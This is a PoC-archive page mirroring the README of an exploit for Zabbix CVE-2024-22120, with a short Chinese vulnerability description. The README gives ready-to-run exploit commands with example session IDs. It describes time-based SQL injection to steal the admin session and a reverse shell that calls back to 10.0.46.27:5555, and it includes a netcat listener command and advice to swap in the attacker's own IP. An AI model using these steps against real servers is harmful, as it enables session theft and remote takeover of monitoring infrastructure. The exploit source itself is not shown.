Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-22120 PoC — Zabbix 安全漏洞

Source
https://github.com/isPique/CVE-2024-22120-RCE-with-gopher
Associated Vulnerability
Title:Zabbix 安全漏洞 (CVE-2024-22120)
Description:Zabbix是Zabbix公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix存在安全漏洞,该漏洞源于对字段未进行有效清理,导致基于时间的盲SQL注入。
Description
This is my exploit for CVE-2024-22120, which involves an SSRF vulnerability inside an XXE with a Gopher payload.
Readme
# Usage

```bash
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>
```

### Example Scenario
You have identified a Zabbix server running on IP `192.168.1.100`, and you have access to a low-privileged user with the following details:
- Session ID (`sid`): `d82bf6715e1d3c1f25`
- Host ID (`hostid`): `10107`
- PHP session ID (`phpsessid`): `a4g7f48d9j3r7h8s9g`

You want to exploit the RCE vulnerability using this script.

### Running the Script

```bash
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3
```

### Parameters Explanation:
- `--ip 192.168.1.100`: The IP address of the Zabbix server.
- `--sid d82bf6715e1d3c1f25`: The session ID of a low-privileged user.
- `--hostid 10107`: The ID of a host that the low-privileged user can access.
- `--phpsessid a4g7f48d9j3r7h8s9g`: The PHP session ID used to authenticate requests.
- `--false_time 1`: Time in seconds to sleep in case of a wrong guess during the SQL injection (default is 1 second).
- `--true_time 3`: Time in seconds to sleep in case of a correct guess during the SQL injection (default is 3 seconds).

### What Happens Next:
1. The script will start by attempting to extract the admin session ID using a time-based SQL injection.
2. Once the admin session ID is obtained, the script will create a reverse shell script on the Zabbix server.
3. Finally, the script will execute the reverse shell, connecting back to your machine on the specified IP and port (`10.0.46.27:5555` in the script).

### Notes:
- Make sure that your machine is listening on the specified port (`5555` in the script) to catch the reverse shell. You can use `netcat` for this:

  ```bash
  nc -lvnp 5555
  ```

- Replace the IP `10.0.46.27` and port `5555` in the `CreateScript` function with your own IP and desired port to receive the reverse shell.
File Snapshot

 [4.0K]  /data/pocs/f37b9c3d6e241a04f85caf22de475ae20118b042
├── [6.2K]  exploit.py
└── [1.9K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.